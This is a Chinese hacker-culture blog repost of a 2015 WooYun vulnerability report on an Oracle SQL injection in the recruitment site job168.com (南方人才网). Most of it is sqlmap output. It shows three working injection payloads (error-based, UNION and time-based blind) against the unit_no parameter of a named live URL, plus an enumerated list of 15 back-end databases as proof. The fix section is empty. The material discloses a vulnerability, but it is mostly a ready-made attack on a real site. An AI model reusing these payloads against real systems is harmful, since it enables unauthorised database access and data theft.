记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

南方人才网oracle注射漏洞一枚

2015-02-09 01:40

code 区域
Place: GET

Parameter: unit_no

Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: unit_no=381312002' AND 7892=(SELECT UPPER(XMLType(CHR(60)||CHR(58)|

|CHR(121)||CHR(121)||CHR(118)||CHR(58)||(SELECT (CASE WHEN (7892=7892) THEN 1 EL

SE 0 END) FROM DUAL)||CHR(58)||CHR(104)||CHR(112)||CHR(113)||CHR(58)||CHR(62)))

FROM DUAL) AND 'hpsA'='hpsA



Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: unit_no=381312002' UNION ALL SELECT NULL,CHR(58)||CHR(121)||CHR(121

)||CHR(118)||CHR(58)||CHR(108)||CHR(111)||CHR(74)||CHR(75)||CHR(103)||CHR(102)||

CHR(76)||CHR(72)||CHR(65)||CHR(120)||CHR(58)||CHR(104)||CHR(112)||CHR(113)||CHR(

58),NULL,NULL,NULL,NULL FROM DUAL--



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: unit_no=381312002' AND 1616=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(

100)||CHR(87)||CHR(105),5) AND 'UlJq'='UlJq

---

[22:19:20] [INFO] the back-end DBMS is Oracle

web application technology: JSP

back-end DBMS: Oracle

漏洞证明:

code 区域
available databases [15]:

[*] BBS

[*] CORE

[*] DBSNMP

[*] GZZP

[*] IPTV

[*] NFRC

[*] OEM_JOB168_CPXT

[*] OUTLN

[*] PERFSTAT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TEST

[*] TSMSYS

[*] WMSYS





code 区域
www.job168.com/english/person/etcpos.jsp?unit_no=381312002

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2015-088502

阅读:183240 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“南方人才网oracle注射漏洞一枚”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云

本页关键词